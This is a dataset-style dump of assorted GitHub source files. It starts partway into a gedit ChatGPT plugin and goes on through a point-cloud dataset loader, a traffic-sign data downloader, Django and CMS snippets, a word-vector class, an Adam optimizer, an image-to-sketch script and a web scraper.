bottom panel.\n self.bottom_bar = Gtk.VBox()\n global textview_textbuffer\n textview_textbuffer = None;\n\n # path of conf file\n self.conf_path=os.path.join(pathlib.Path.home(),'GoToChatGPT.json');\n self.dict_conf = load_conf_dict(self.conf_path);\n\n #this is called every time the gui is updated\n def do_update_state(self):\n # if there is no document in sight, we disable the action, so we don't get NoneException\n if self.window.get_active_view() is not None:\n for dat in self.dict_conf['commands']:\n self.window.lookup_action(dat['name']).set_enabled(True)\n\n def do_activate(self):\n # Defining the action which was set earlier in AppActivatable.\n self._connect_menu()\n self._insert_bottom_panel()\n\n def _connect_menu(self):\n for dat in self.dict_conf['commands']:\n action = Gio.SimpleAction(name=dat['name'])\n action.connect('activate', self.action_command)\n self.window.add_action(action)\n\n def action_command(self, action, data):\n global textview_textbuffer\n mytext=self._get_selected_text();\n if mytext!=None:\n result=working_over_text(mytext,self.dict_conf,action.get_name(),self.dict_conf['api_key']);\n textview_textbuffer.set_text(result);\n\n def _insert_bottom_panel(self):\n global textview_textbuffer\n textview_panel = Gtk.TextView()\n textview_panel.set_top_margin(10);\n textview_panel.set_right_margin(10);\n textview_panel.set_bottom_margin(10);\n textview_panel.set_left_margin(10);\n \n #textview_panel.modify_bg(Gtk.StateType.NORMAL, Gdk.Color(62535, 62535, 62535))\n textview_textbuffer = textview_panel.get_buffer()\n textview_textbuffer.set_text(\"This is some text inside of a Gtk.TextView. \")\n\n # Add elements to panel.\n self.bottom_bar.add(textview_panel)\n\n # Get bottom bar (A Gtk.Stack) and add our bar. \n panel = self.window.get_bottom_panel()\n panel.add_titled(self.bottom_bar, 'examplepanel', \"Output ChatGPT\")\n # Make sure everything shows up.\n panel.show()\n self.bottom_bar.show_all()\n panel.set_visible_child(self.bottom_bar)\n\n def do_deactivate(self):\n self._remove_bottom_panel()\n\n def _remove_bottom_panel(self):\n panel = self.window.get_bottom_panel()\n panel.remove(self.bottom_bar)\n\n ## preferences->plugins->nameplugin->preferences\n def do_create_configure_widget(self):\n \n # Just return your box, PeasGtk will automatically pack it into a box and show it.\n box=Gtk.VBox()\n #\n label1=Gtk.Label(); \n label1.set_markup('Configure file:');\n box.add(label1);\n box.add(Gtk.Label(self.conf_path))\n #\n label2=Gtk.Label(); \n label2.set_markup('API Key:');\n box.add(label2);\n box.add(Gtk.Label(self.dict_conf['api_key']))\n return box\n \n # get the selectd text\n def _get_selected_text(self):\n view = self.window.get_active_view()\n if view:\n buffer = view.get_buffer()\n text = buffer.get_text(buffer.get_start_iter(),\n buffer.get_end_iter(),\n include_hidden_chars=True)\n selected_text = buffer.get_selection_bounds()\n if selected_text:\n start, end = selected_text\n selected_text = buffer.get_text(start, end, True)\n #print(\"Texto seleccionado: \", selected_text)\n return selected_text;\n else:\n print(\"No se ha seleccionado ningún texto.\")\n return None;\n else:\n print(\"No hay una vista activa en la ventana actual.\")\n return None;\n\n\n\nclass GoToChatGPTViewActivatable(GObject.Object, Gedit.ViewActivatable):\n __gtype_name__ = \"GoToChatGPTViewActivatable\"\n\n view = GObject.property(type=Gedit.View)\n\n def __init__(self):\n GObject.Object.__init__(self)\n # path of conf file\n self.conf_path=os.path.join(pathlib.Path.home(),'GoToChatGPT.json');\n self.dict_conf = load_conf_dict(self.conf_path);\n\n def do_activate(self):\n #print(\"Plugin created for\", self.view)\n self.view.translate_view_activatable = self\n self.popup_handler_id = self.view.connect('populate-popup', self.populate_popup)\n \n def do_deactivate(self):\n print(\"Plugin stopped for\", self.view)\n\n def do_update_state(self):\n # Called whenever the view has been updated\n print(\"Plugin update for\", self.view)\n \n def populate_popup(self, view, popup):\n if not isinstance(popup, Gtk.MenuShell):\n return\n \n item = Gtk.SeparatorMenuItem()\n item.show()\n popup.append(item)\n\n for dat in self.dict_conf['commands']:\n item = Gtk.MenuItem.new_with_mnemonic(dat['summary']);\n item.set_sensitive(self.is_enabled());\n item.show();\n funcs = lambda i,j=dat['name']: self.working_callback(i,view.get_buffer(),j);\n item.connect('activate', funcs);\n popup.append(item);\n \n def working_callback(self,item,document,action_name):\n global textview_textbuffer\n start, end = document.get_selection_bounds();\n mytext = document.get_text(start, end, False);\n\n newtext=working_over_text(mytext,self.dict_conf,action_name,self.dict_conf['api_key']);\n #print(newtext);\n textview_textbuffer.set_text(newtext);\n\n def is_enabled(self):\n document = self.view.get_buffer()\n if document is None:\n return False\n\n start = None\n end = None\n\n try:\n start, end = document.get_selection_bounds()\n\n except:\n pass\n\n return start is not None and end is not None","repo_name":"trucomanx/gedit-plugin-gotochatgpt","sub_path":"gotochatgpt/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":8860,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"34202191345","text":"import os\nimport numpy as np\nimport torch.utils.data\n\n\nclass SLPDataset(torch.utils.data.Dataset):\n def __init__(self, cfg, domain, phase, split, cover_conds=[]):\n positions = cfg.SLP_DATASET.POSITION\n if positions == 'all':\n positions = ['supine', 'left', 'right']\n elif positions == 'lateral':\n positions = ['left', 'right']\n else:\n positions = [positions]\n\n if split == 'train':\n # leave out subject 7 due to calibration issue faced by Clever et al.\n subjects = np.concatenate((np.arange(1, 7), np.arange(8, 71)))\n subjects = np.random.default_rng(12345).permutation(subjects)\n if domain == 'source':\n subjects = subjects[:29]\n elif domain == 'target':\n subjects_cov1 = subjects[29:49]\n subjects_cov2 = subjects[49:]\n else:\n raise ValueError()\n elif split == 'val':\n subjects = np.arange(71, 81)\n elif split == 'test':\n subjects = np.arange(81, 103)\n else:\n raise ValueError('The specified split {} is not a valid data split.'.format(split))\n\n # build data list\n self.data_list = []\n if split == 'train' and domain == 'target':\n for subj in subjects_cov1:\n for pos in positions:\n if pos == 'supine':\n pose_no_range = [1, 16]\n elif pos == 'left':\n pose_no_range = [16, 31]\n elif pos == 'right':\n pose_no_range = [31, 46]\n else:\n raise ValueError\n for pose_no in range(pose_no_range[0], pose_no_range[1]):\n item = {'subj_no': subj,\n 'pos': pos,\n 'cover_cond': 'cover1',\n 'pose_no': pose_no\n }\n self.data_list.append(item)\n for subj in subjects_cov2:\n for pos in positions:\n if pos == 'supine':\n pose_no_range = [1, 16]\n elif pos == 'left':\n pose_no_range = [16, 31]\n elif pos == 'right':\n pose_no_range = [31, 46]\n else:\n raise ValueError\n for pose_no in range(pose_no_range[0], pose_no_range[1]):\n item = {'subj_no': subj,\n 'pos': pos,\n 'cover_cond': 'cover2',\n 'pose_no': pose_no\n }\n self.data_list.append(item)\n\n else:\n if cover_conds == []:\n if domain == 'source':\n cover_conds = ['uncover']\n elif domain == 'target':\n cover_conds = ['cover1', 'cover2']\n else:\n raise ValueError()\n for subj in subjects:\n for pos in positions:\n if pos == 'supine':\n pose_no_range = [1, 16]\n elif pos == 'left':\n pose_no_range = [16, 31]\n elif pos == 'right':\n pose_no_range = [31, 46]\n else:\n raise ValueError\n for cover_cond in cover_conds:\n for pose_no in range(pose_no_range[0], pose_no_range[1]):\n item = {'subj_no': subj,\n 'pos': pos,\n 'cover_cond': cover_cond,\n 'pose_no': pose_no\n }\n self.data_list.append(item)\n\n self.root = cfg.SLP_DATASET.ROOT\n self.input_template = '3d_data_{}_{}/danaLab_{:05d}_{}_{:03d}_bed_pcd.npy'\n self.target_template = 'gt_joints_3d/subject_{:03d}_pose_{:02d}_gt_joints.npy'\n\n self.is_train = True if phase == 'train' else False\n\n if self.is_train:\n if domain == 'source':\n self.num_points = cfg.INPUT.NUM_POINTS\n self.rotation = cfg.INPUT.ROT_DEGREE\n self.translation = cfg.INPUT.TRANSLATION\n else:\n self.num_points = cfg.INPUT.NUM_POINTS_TARGET\n self.rotation = cfg.INPUT.ROT_DEGREE_TARGET\n self.translation = cfg.INPUT.TRANSLATION_TARGET\n else:\n self.num_points = cfg.INPUT.NUM_POINTS_TEST\n self.rotation = 0.\n self.translation = 0.\n\n def __getitem__(self, idx):\n # create paths of input pcd and gt joints\n item = self.data_list[idx]\n pcd_path = self.input_template.format(item['pos'],\n item['cover_cond'],\n item['subj_no'],\n item['cover_cond'],\n item['pose_no'])\n joints_path = self.target_template.format(item['subj_no'], item['pose_no'])\n\n # load pcd\n pcd = np.float32(np.load(os.path.join(self.root, pcd_path)))\n mean = np.mean(pcd, axis=0)\n pcd -= mean\n\n # load joints\n joints = np.float32(np.load(os.path.join(self.root, joints_path)))\n joints -= mean\n\n # data augmentation:\n if self.is_train and self.rotation > 0.:\n theta = np.deg2rad(np.random.uniform(-self.rotation, self.rotation))\n rotation_matrix = np.float32(np.array([[np.cos(theta), -np.sin(theta), 0],\n [np.sin(theta), np.cos(theta), 0],\n [0., 0., 1.], ]))\n pcd = np.dot(pcd, rotation_matrix)\n joints = np.dot(joints, rotation_matrix)\n\n if self.is_train and self.translation > 0.:\n transl = np.random.uniform(-1., 1., (1, 3)) * self.translation\n pcd += transl\n joints += transl\n\n # subsample points of point cloud\n if self.num_points > 0:\n pts_size = pcd.shape[0]\n\n if pts_size >= self.num_points:\n if self.is_train:\n permutation = np.random.default_rng().permutation(pts_size)\n else:\n permutation = np.random.default_rng(12345).permutation(pts_size)\n pcd = pcd[permutation, :]\n pcd = pcd[:self.num_points, :]\n else:\n if self.is_train:\n pts_idx = np.random.choice(pts_size, self.num_points, replace=True)\n else:\n pts_idx = np.random.default_rng(12345).choice(pts_size, self.num_points, replace=True)\n pcd = pcd[pts_idx, :]\n pcd = pcd.T\n\n return pcd, joints, idx\n\n def __len__(self):\n return len(self.data_list)\n","repo_name":"multimodallearning/da-3dhpe-anatomy","sub_path":"data/slp_dataset.py","file_name":"slp_dataset.py","file_ext":"py","file_size_in_byte":7189,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"3"}
+{"seq_id":"35333314734","text":"class Person(object):\n __money = 0\n school = \"默认school\"\n def __init__(self,name,age,gender,money):\n self.__money = money\n self.gender = gender\n self.name = name\n self.age = age\n self.__money = money\n def __str__(self):\n return \"名字是:%s,年龄是:%s,性别是:%d\"%(self.name,self.age,self.gender)\n def setmoney(self,money):\n if money<0:\n money = 0\n self.__money = money\n def getmoney(self):\n print(self.__money)\n return self.__money\np1 = Person('donghao',18,0,1000)\n\n#打印全部属性\nprint(p1.name,p1.age,p1.gender)\n\np1.setmoney(12)\np1.getmoney()\n\n#通过内部方法,修改私有属性\n#通过自定义的方法实现对室友属性的赋值与取值\n\nprint(hasattr(p1,'name'))\n'''\n你也可以使用以下函数的方式来访问属性:\n getattr(obj, name[, default]) : 访问对象的属性。\n hasattr(obj,name) : 检查是否存在一个属性。\n setattr(obj,name,value) : 设置一个属性。如果属性不存在,会创建一个新属性。\n delattr(obj, name) : 删除属性。\n'''\n\n\n\n","repo_name":"RelaxedDong/python_base","sub_path":"面向对象/访问限制.py","file_name":"访问限制.py","file_ext":"py","file_size_in_byte":1129,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"}
+{"seq_id":"16840161844","text":"# https://stackoverflow.com/questions/5710867/downloading-and-unzipping-a-zip-file-without-writing-to-disk\n\nfrom io import BytesIO\nfrom zipfile import ZipFile\nfrom urllib.request import urlopen\n\nfrom src.utility.file_utility import remove_folder_tree, move_file, move_directory, create_directory\n\n\ndef init_training_data_folder(training_zip_path='http://benchmark.ini.rub.de/Dataset/GTSRB_Final_Training_Images.zip',\n out_path='data/training'):\n extract_dir_from_web(training_zip_path, out_path)\n move_file('data/training/GTSRB/Readme-Images.txt', out_path + '/readme-images.txt')\n move_directory('data/training/GTSRB/Final_Training/Images', out_path + '/images')\n remove_folder_tree(out_path + '/GTSRB')\n\n\ndef init_testing_data_folder(testing_zip_path='http://benchmark.ini.rub.de/Dataset/GTSRB_Final_Test_Images.zip',\n out_path='data/testing'):\n extract_dir_from_web(testing_zip_path, out_path)\n move_file('data/testing/GTSRB/Readme-Images-Final-test.txt', out_path + '/readme-images-final-test.txt')\n move_directory('data/testing/GTSRB/Final_Test/Images', out_path + '/images')\n remove_folder_tree(out_path + '/GTSRB')\n\n\ndef init_testing_id_file(testing_zip_id_path='http://benchmark.ini.rub.de/Dataset/GTSRB_Final_Test_GT.zip',\n out_path='data/testing'):\n extract_dir_from_web(testing_zip_id_path, out_path)\n move_file('data/testing/GT-final_test.csv', out_path + '/testing_table.csv')\n\n\ndef init_directories(training_path='data/training', testing_path='data/testing'):\n create_directory('model')\n create_directory('model/checkpoints')\n create_directory('model/weights')\n create_directory('log')\n create_directory('stats')\n create_directory(training_path)\n create_directory(testing_path)\n\n\ndef extract_dir_from_web(url, out_dir):\n print('Loading file from url ... \\t(' + url + ')')\n res = urlopen(url)\n\n with ZipFile(BytesIO(res.read())) as zip_object:\n print('Extracting file in ' + out_dir)\n zip_object.extractall(out_dir)\n\n\ndef get_file_name(path):\n return path.split('/')[-1]\n\n","repo_name":"AlessandroStaffolani/traffic-sign-recognition","sub_path":"src/init.py","file_name":"init.py","file_ext":"py","file_size_in_byte":2143,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"15372473634","text":"#exploring random python number generator\n\nimport random\n\n\n# This prints a series of random numbers\nfor item in range(1,5):\n value = random.randint(1*10^10,2*9)\n # print(value)\n\nfood = ['Pizza' , 'Burger', 'Doughnut', 'Cheese'] \n# rand_food = random.choice(food)\nshuffled_food = random.shuffle(food)\nprint(shuffled_food)\n\n\n\n","repo_name":"EngineerDanny/revisiting-python","sub_path":"main/random.py","file_name":"random.py","file_ext":"py","file_size_in_byte":330,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"}
+{"seq_id":"23516553611","text":"__author__ = \"aki\"\n\n# API Header\n# Package: Basic\n# Modules: All\n# Sub Module: All\n# Usage: This task is used to save import consumer\n# Tables used: ScheduleLog, ReadCycle, Premise, Meter, ConsumerServiceContract, ConsumerDetail\n# Author: Akshay\n# Created on: 26/02/2021\n\nfrom celery.task import task\nfrom v1.commonapp.models.global_lookup import get_global_lookup_by_id\nfrom v1.commonapp.views.logger import logger\nfrom v1.commonapp.models.premises import get_premise_by_id_string\nfrom v1.consumer.models.consumer_master import get_consumer_by_id\nfrom v1.consumer.models.consumer_service_contract_details import get_consumer_service_contract_detail_by_meter_id\nfrom v1.meter_data_management.models.consumer_detail import ConsumerDetail as ConsumerDetailTbl\nfrom v1.meter_data_management.models.meter import Meter as MeterTbl\nfrom v1.meter_data_management.models.read_cycle import get_read_cycle_by_id\nfrom v1.meter_data_management.models.route import get_route_by_id_string\nfrom v1.meter_data_management.models.schedule import get_schedule_by_id\nfrom v1.meter_data_management.models.schedule_log import ScheduleLog as ScheduleLogTbl, SCHEDULE_LOG_STATUS_DICT\n\n\n@task(name=\"ImportConsumer-task\", queue='ImportConsumer')\ndef create_consumer(schedule_log_id):\n try:\n count = 0\n schedule_log_obj = ScheduleLogTbl.objects.get(id=schedule_log_id)\n schedule_log_obj.change_state(SCHEDULE_LOG_STATUS_DICT[\"IN-PROGRESS\"])\n read_cycle_obj = get_read_cycle_by_id(schedule_log_obj.read_cycle_id)\n for route in read_cycle_obj.route_json:\n route_obj = get_route_by_id_string(route['id_string'])\n for premise in route_obj.premises_json:\n premise_obj = get_premise_by_id_string(premise['id_string'])\n meter_obj = MeterTbl.objects.filter(premise_id=premise_obj.id, is_active=True)\n for meter in meter_obj:\n consumer_meter_obj = get_consumer_service_contract_detail_by_meter_id(meter.id)\n consumer_obj = get_consumer_by_id(consumer_meter_obj.consumer_id)\n if ConsumerDetailTbl.objects.filter(schedule_log_id=schedule_log_obj.id,\n consumer_no=consumer_obj.consumer_no,\n meter_no=meter.meter_no,\n is_active=True).exists():\n print('Already Exist')\n count += 1\n else:\n consumer_detail_obj = ConsumerDetailTbl(\n tenant=route_obj.tenant,\n utility=route_obj.utility,\n consumer_id=consumer_obj.id,\n meter_id=meter.id,\n schedule_log_id=schedule_log_obj.id,\n read_cycle_id=read_cycle_obj.id,\n route_id=route_obj.id,\n premise_id=premise_obj.id,\n activity_type_id=schedule_log_obj.activity_type_id,\n utility_product_id=schedule_log_obj.utility_product_id,\n consumer_no=consumer_obj.consumer_no,\n meter_no=meter.meter_no,\n )\n consumer_detail_obj.save()\n\n meter_type_obj = get_global_lookup_by_id(meter.meter_type_id)\n\n if meter_type_obj.key == 'smart':\n consumer_detail_obj.state = 1\n else:\n consumer_detail_obj.state = 0\n\n consumer_detail_obj.save()\n count += 1\n print('Consumer Save')\n\n consumer_detail_count = ConsumerDetailTbl.objects.filter(schedule_log_id=schedule_log_obj.id,\n is_active=True).count()\n schedule_obj = get_schedule_by_id(schedule_log_obj.schedule_id)\n\n if count == 0:\n schedule_log_obj.change_state(SCHEDULE_LOG_STATUS_DICT[\"NO-DATA\"])\n elif count == consumer_detail_count:\n schedule_log_obj.change_state(SCHEDULE_LOG_STATUS_DICT[\"COMPLETED\"])\n schedule_obj.schedule_status = 2\n schedule_obj.save()\n else:\n schedule_log_obj.change_state(SCHEDULE_LOG_STATUS_DICT[\"PARTIAL\"])\n schedule_obj.schedule_status = 2\n schedule_obj.save()\n except Exception as ex:\n print(ex)\n logger().log(ex, 'MEDIUM', module='CONSUMER OPS', sub_module='METER DATA')\n","repo_name":"bynryTechnologies/Neovibe-API","sub_path":"api/v1/meter_data_management/task/consumer_detail.py","file_name":"consumer_detail.py","file_ext":"py","file_size_in_byte":4703,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"24858188422","text":"from rest_framework import routers\nfrom django.urls import path, include \n\nfrom .views import (\n BlogViewSet,\n CreateViewSet\n)\n\nrouter = routers.DefaultRouter()\nrouter.register('blogs', BlogViewSet, basename='blogs')\nrouter.register('create', CreateViewSet, basename='create')\n\nurlpatterns = [\n path('', include(router.urls)), \n]\n","repo_name":"Azazel5/Personal-Website","sub_path":"blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":339,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"47338757758","text":"from cms.plugin_base import CMSPluginBase\nfrom cms.plugin_pool import plugin_pool\n\nfrom django.utils.translation import gettext_lazy as _\n\nfrom taccsite_cms.contrib.helpers import concat_classnames\n\nfrom .models import TaccsiteOffset, DIRECTION_DICT\n\n# Helpers\n\n# FAQ: This exists to retireve classnames via consistently-named functions\n# SEE: taccsite_cms.contrib.taccsite_static_article_list.cms_plugins\ndef get_direction_classname(value):\n \"\"\"Get direction class based on value.\"\"\"\n return DIRECTION_DICT.get(value, {}).get('classname')\n\n# Plugins\n\n@plugin_pool.register_plugin\nclass TaccsiteOffsetPlugin(CMSPluginBase):\n \"\"\"\n Components > \"Offset Content\" Plugin\n https://confluence.tacc.utexas.edu/x/FIEjCQ\n \"\"\"\n module = 'TACC Site'\n model = TaccsiteOffset\n name = _('Offset Content')\n render_template = 'offset.html'\n\n cache = True\n text_enabled = False\n allow_children = True\n\n fieldsets = [\n (None, {\n 'fields': (\n 'direction',\n )\n }),\n (_('Advanced settings'), {\n 'classes': ('collapse',),\n 'fields': (\n 'attributes',\n )\n }),\n ]\n\n # Render\n\n def render(self, context, instance, placeholder):\n context = super().render(context, instance, placeholder)\n request = context['request']\n\n classes = concat_classnames([\n get_direction_classname(instance.direction),\n instance.attributes.get('class'),\n ])\n instance.attributes['class'] = classes\n\n return context\n","repo_name":"TACC/Core-CMS","sub_path":"taccsite_cms/contrib/taccsite_offset/cms_plugins.py","file_name":"cms_plugins.py","file_ext":"py","file_size_in_byte":1592,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"}
+{"seq_id":"73946566161","text":"import math\nimport heapq\n\nfrom collections import Counter, defaultdict\n\nfrom in2110.oblig1b import visualize_word_vectors\n\nfrom in2110.corpora import aviskorpus_10_nn\n\ndef preprocess(sentences):\n return list(([t.lower() for t in sent.split()] for sent in sentences))\n\ndef context_window(sent, pos, size):\n return sent[max(pos-size, 0):pos] + sent[pos+1:pos+1+size]\n\nclass WordVectorizer(object):\n def __init__(self, max_features, window_size, normalize=False):\n self.max_features = max_features\n self.window_size = window_size\n self.normalize = normalize\n self.matrix = defaultdict(Counter)\n self.is_normalized = False\n\n def fit(self, sentences):\n # Count word frequencies in order to use only the most\n # frequent words as features.\n freqs = Counter(t for s in sentences for t in s)\n\n # Create vocabulary form the most frequent words\n self.vocab = set(w for w,c in freqs.most_common(self.max_features))\n\n # Iterate over sentences to build co-occurence matrix\n for sent in sentences:\n for i in range(len(sent)):\n t = sent[i]\n if t in self.vocab:\n context = context_window(sent, i, self.window_size)\n\n for ct in context:\n if ct in self.vocab:\n self.matrix[t][ct] += 1\n\n if self.normalize:\n self.normalize_vectors()\n\n def transform(self, words):\n vecs = []\n for w in words:\n assert w in self.matrix\n vecs.append(self.matrix[w])\n return vecs\n\n def vector_norm(self, word):\n vec = self.matrix[word]\n return math.sqrt(sum(v**2 for v in vec.values()))\n\n def normalize_vectors(self):\n for w, vec in self.matrix.items():\n norm = self.vector_norm(w)\n\n for key in vec:\n vec[key] /= norm\n\n self.is_normalized = True\n\n def euclidean_distance(self, w1, w2):\n vec1, vec2 = self.transform((w1, w2))\n\n # Save computation by only computing values for features that\n # are active in one of the vectors.\n union = vec1.keys() | vec2.keys()\n\n return math.sqrt(sum((vec1[key] - vec2[key])**2\n for key in union))\n\n def cosine_similarity(self, w1, w2):\n vec1, vec2 = self.transform((w1, w2))\n\n # Save computatoin by only computing values for features that\n # are active in both vectors\n intersect = set(vec1.keys()).intersection(vec2.keys())\n\n dot_product = sum(vec1[key]*vec2[key] for key in intersect)\n\n # Return dot product for normalized vectors\n if self.is_normalized:\n return dot_product\n else:\n return dot_product / (self.vector_norm(w1)*self.vector_norm(w2))\n\n def nearest_neighbors(self, w, k=5):\n if w in self.vocab:\n # Use heapq to efficienctly find the top k neighbors.\n return heapq.nlargest(k,\n ((other, self.cosine_similarity(w, other))\n for other in self.matrix if other != w),\n key=lambda x : x[1])\n\nprint(\"Loading corpus...\")\nsentences = preprocess(aviskorpus_10_nn.sentences())\n\nvec = WordVectorizer(5000, 5)\nvec.fit(sentences)\n","repo_name":"joevko/projects","sub_path":"in2110/in2110-lab-master/in2110-lab-master/gruppetimer/02-oblig-v2019/in2110-oblig-1b-solution.py","file_name":"in2110-oblig-1b-solution.py","file_ext":"py","file_size_in_byte":3362,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"23633001109","text":"class Queue():\n def __init__(self, queue: list):\n self.queue = queue\n\n def pop(self):\n if self.queue:\n return self.queue.pop(-1)\n else:\n return None\n\n def push(self, tree_node: TreeNode):\n self.queue.append(tree_node)\n\nclass Solution:\n def getTargetCopy(self, original: TreeNode, cloned: TreeNode, target: TreeNode) -> TreeNode:\n queue = Queue([cloned])\n while True:\n node = queue.pop()\n if node is None:\n break\n if node.val == target.val:\n return node\n if not node.right is None:\n queue.push(node.right)\n if not node.left is None:\n queue.push(node.left)\n return None\n","repo_name":"licht110/leetcode","sub_path":"algorithms/1379/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":766,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"74427487441","text":"# Properties to check. The property 'order' doesn't have to be here.\nproperties = ['configVersion', 'chartName', 'chartVersion']\nexecuteModify = False\nfor prop in properties:\n if (deployed[prop] != previousDeployed[prop]):\n executeModify = True\n\nif executeModify:\n myStep = steps.os_script(\n description = \"Updating component {0}\".format(deployed.name),\n order = deployed['order'],\n script = \"scripts/modify.sh.ftl\",\n freemarker_context = {\n \"deployedApplicationVersion\": deployedApplication.version.name,\n \"deployedApplicationEnvironment\": deployedApplication.environment.name\n # Some more properties\n }\n )\nelse:\n myStep = steps.noop(\n description = \"Only the 'order' property has changed. Nothing to do on {0}\".format(deployed.name),\n order = deployed['order']\n )\n\ncontext.addStep(myStep)","repo_name":"jclopeza/xld-custom-extensions","sub_path":"xld-custom-order-plugin/planning/GenerateCustomSteps.py","file_name":"GenerateCustomSteps.py","file_ext":"py","file_size_in_byte":894,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"24605893250","text":"#!/usr/bin/env python3\n\"\"\"\nAdam optimization algorithm\n\"\"\"\n\n\nimport numpy as np\n\n\ndef update_variables_Adam(alpha, beta1, beta2, epsilon, var, grad, v, s, t):\n \"\"\"\n Updates a variable in place using the Adam optimization algorithm.\n Args:\n alpha: learning rate\n beta1: weight used for the first moment\n beta2: weight used for the second moment\n epsilon: small number to avoid division by zero\n var: numpy.ndarray containing the variable to be updated\n grad: numpy.ndarray containing the gradient of var\n v: previous first moment of var\n s: previous second moment of var\n t: time step used for bias correction\n Returns:\n The updated variable, the new first moment, and the new second moment,\n respectively.\n \"\"\"\n vdw = (beta1*v) + ((1-beta1)*grad)\n vdw_correct = vdw/(1-(beta1**t))\n sdw = (beta2*s) + (1-beta2)*(grad**2)\n sdw_correct = sdw/(1-(beta2**t))\n sdw_correct_sqrt = (sdw_correct**(1/2.0))+epsilon\n return var - (alpha*(vdw_correct/sdw_correct_sqrt)), vdw, sdw\n","repo_name":"Luffy981/holbertonschool-machine_learning","sub_path":"supervised_learning/0x03-optimization/9-Adam.py","file_name":"9-Adam.py","file_ext":"py","file_size_in_byte":1098,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"}
+{"seq_id":"12696604364","text":"import numpy as np\r\nimport imageio\r\nimport scipy.ndimage\r\nimport cv2\r\n\r\n\r\nprint(\"=========================\")\r\nprint(\"Image To Sketch Converter\")\r\nprint(\"=========================\\n\")\r\nimg = input(\"Enter image Name: \")\r\n\r\ndef rgb2gray(rgb):\r\n return np.dot(rgb[...,:3],[0.2989,0.5870,0.1140])\r\n\r\ndef dodge(front,back):\r\n final_sketch = front*255/(255-back)\r\n final_sketch[final_sketch>255]=255\r\n final_sketch[back==255]=255\r\n return final_sketch.astype('uint8')\r\n\r\nss = imageio.imread(img)\r\ngray = rgb2gray(ss)\r\n\r\ni = 255-gray\r\n\r\nblur = scipy.ndimage.filters.gaussian_filter(i,sigma =15)\r\nr = dodge(blur,gray)\r\n\r\n\r\nif '.jpg' in img:\r\n img = img.replace('.jpg', '')\r\nelif '.png' in img:\r\n img = img.replace('.png', '')\r\nelif '.svg' in img:\r\n img = img.replace('.svg', '')\r\nelif '.jpeg' in img:\r\n img = img.replace('.jpeg', '')\r\n\r\n\r\ncv2.imwrite(img + ' - Sketch.png',r)\r\n","repo_name":"Aessteer/Image-to-Sketch-Using-Python","sub_path":"Sketch.py","file_name":"Sketch.py","file_ext":"py","file_size_in_byte":895,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"}
+{"seq_id":"20161410765","text":"print(\"Enter Number of Train Data : \")\r\ninpt = input()\r\n\r\nn = int(inpt)\r\n\r\nweight = []\r\nheight = []\r\nlabel = []\r\n\r\nprint(\"Enter Train Data : \\n\")\r\n\r\n#for i in range(n):\r\nw,h,l = input().split()\r\n\r\nm=w+h\r\n\r\nprint(m)\r\nprint(l)\r\n\r\n#weight=int(w)\r\n#height=int(h)\r\n#label=l;\r\n","repo_name":"AnamIslam/PatternRecognitionLab","sub_path":"Lab 1/PatternExp.py","file_name":"PatternExp.py","file_ext":"py","file_size_in_byte":271,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"41293913571","text":"import pandas as pd\nimport requests\nfrom bs4 import BeautifulSoup\nimport re\nimport json\nimport lxml\n\ndef scrap_data(web):\n html = requests.get(web)\n # if html.status_code != 200:\n # Collect description\n data = re.search(r'window\\.initialAppState = ({.*});', html.text)\n data = json.loads(data.group(1))\n desc = data['preFetchedData']['organization']['description']\n \n if desc != None:\n # Clean description\n desc = desc.replace(' ', '')\n desc = desc.replace('\\n
', '\\n ')\n desc = desc.replace('
', ' ')\n desc = desc.replace('
', '')\n else:\n desc = ''\n\n # Images\n imageID = data['preFetchedData']['organization']['profilePicture']\n if imageID != None: image = data['imageServerBaseUrl'] + imageID\n else: image = ''\n\n # Summary\n summary = data['preFetchedData']['organization']['organizationType']['name']\n if summary == None: summary = ''\n return image, desc, summary\n\n\ndef main():\n df = pd.read_csv('./data/DPU_Org_Description.csv')\n arr_desc = []\n arr_img = []\n arr_summary = []\n for i in range(len(df)):\n image, desc, summary = scrap_data(df['URL'][i])\n print(df['Org'][i], ' Success')\n arr_desc.append(desc)\n arr_img.append(image)\n arr_summary.append(summary)\n df['Description'] = arr_desc\n df['Image'] = arr_img\n df['Summary'] = arr_summary\n df.to_csv('./data/DPU_desc.csv', index=False)\nmain()","repo_name":"hieumtran/DeBOO","sub_path":"src/org_description.py","file_name":"org_description.py","file_ext":"py","file_size_in_byte":1464,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
